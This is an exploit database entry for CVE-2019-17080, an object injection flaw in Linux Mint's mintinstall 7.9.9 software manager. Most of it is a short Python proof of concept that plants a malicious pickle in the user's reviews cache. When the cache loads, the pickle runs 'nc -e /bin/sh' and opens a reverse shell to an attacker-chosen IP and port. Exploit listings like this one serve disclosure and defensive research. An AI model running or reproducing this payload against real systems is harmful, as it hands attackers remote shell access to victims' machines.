Lucene search

K
zdtAndhrimnirr1337DAY-ID-33312
HistoryOct 04, 2019 - 12:00 a.m.

mintinstall 7.9.9 - Code Execution Exploit

2019-10-0400:00:00
Andhrimnirr
0day.today
32

EPSS

0.003

Percentile

72.0%

Exploit for linux platform in category web applications

# Exploit Title: mintinstall (aka Software Manager) object injection
# Exploit Author: Andhrimnirr
# Vendor Homepage: https://www.linuxmint.com/
# Software Link: mintinstall (aka Software Manager)
# Version: 7.9.9
# Tested on: Linux Mint
# CVE : CVE-2019-17080


import os
import sys
def shellCode(payload):
    with open(f"{os.getenv('HOME')}/.cache/mintinstall/reviews.cache","w") as wb:
        wb.write(payload)
    print("[+] Start mintinstall")
if __name__=="__main__":
    shellCode(f"""cos\nsystem\n(S"nc -e /bin/sh {sys.argv[1]} {sys.argv[2]}"\ntR.""")
else:
    print("[!] exploit.py [IP] [PORT]")

#  0day.today [2019-12-04]  #

EPSS

0.003

Percentile

72.0%